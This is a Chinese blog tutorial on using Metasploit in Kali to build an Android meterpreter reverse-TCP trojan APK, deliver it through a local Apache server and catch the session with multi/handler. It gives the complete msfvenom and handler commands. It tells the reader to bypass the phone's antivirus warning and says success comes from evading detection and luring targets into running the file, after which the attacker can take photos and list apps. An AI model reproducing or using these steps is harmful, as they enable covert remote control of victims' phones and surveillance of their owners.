当前位置:   article > 正文

kali_msf6_渗透

msf6

奶奶曾说过,证明自己学懂的方式就是教会别人。

工具简介:

msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。

通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为kali的工具含量对于初学者来讲,还是比较广的,给我们去了解渗透工作,足够。

作者环境:

kali2020:版本没啥说的,至少用跟你现在电脑兼容的吧,下载链接已奉上

Get Kali | Kali Linux

局域网:kali的网卡与主机网卡要共享,并且主机与目标机在同一个局域网内

下面开始操作: 

生成监听木马

 

  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=5000 R > test.apk
  2. # msf的模块 kali的ip kali的端口 生成文件

 注意我们代码此时的路径在/home/lqx/桌面,这样我们生成的文件可以在桌面直接看到

将木马下载到手机

通过kali的apache服务将文件上传至服务器,而手机则通过kali的ip地址登陆服务器并下载木马。

/etc/init.d/apache2 start #开启apache服务

 将刚刚生成的文件移动到/etc/www/html目录下,并删除此路径下的index.html文件

  1. mv test.apk /var/www/html
  2. #将test.apk文件移动到/var/www/html路径下
  3. cd /var/www/html
  4. #切换窗口的操作路径
  5. rm index.html
  6. #删除index.html文件

我们在浏览器输入kali的ip地址并下载测试用的木马文件

 

因为没有做防杀,所以立刻就被系统检测,不用担心我们“继续安装”。

安装完成后,我们直接运行它。因为生成的是纯木马文件没有任何伪装,运行了也不会有‘任何效果’

开启msf

before

after

msfconsole  #开启msf

配置参数

成功建立会话后进入meterpreter
  1. use multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.5.100 #kali的ip
  4. set LPORT 5000 #kali的端口
  5. #与前面配置木马时的host、port参数一致
  6. run
  7. #开始监听

 测试渗透结果:

其实到这里我们就已经成功了,接下里我们可以在kali上对手机进行,拍照,查看app,等不可描述的操作,究其原理就是木马够接地气不被杀毒软件检测,其次诱导目标运行。

app_list #查看手机安装的app

 

本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号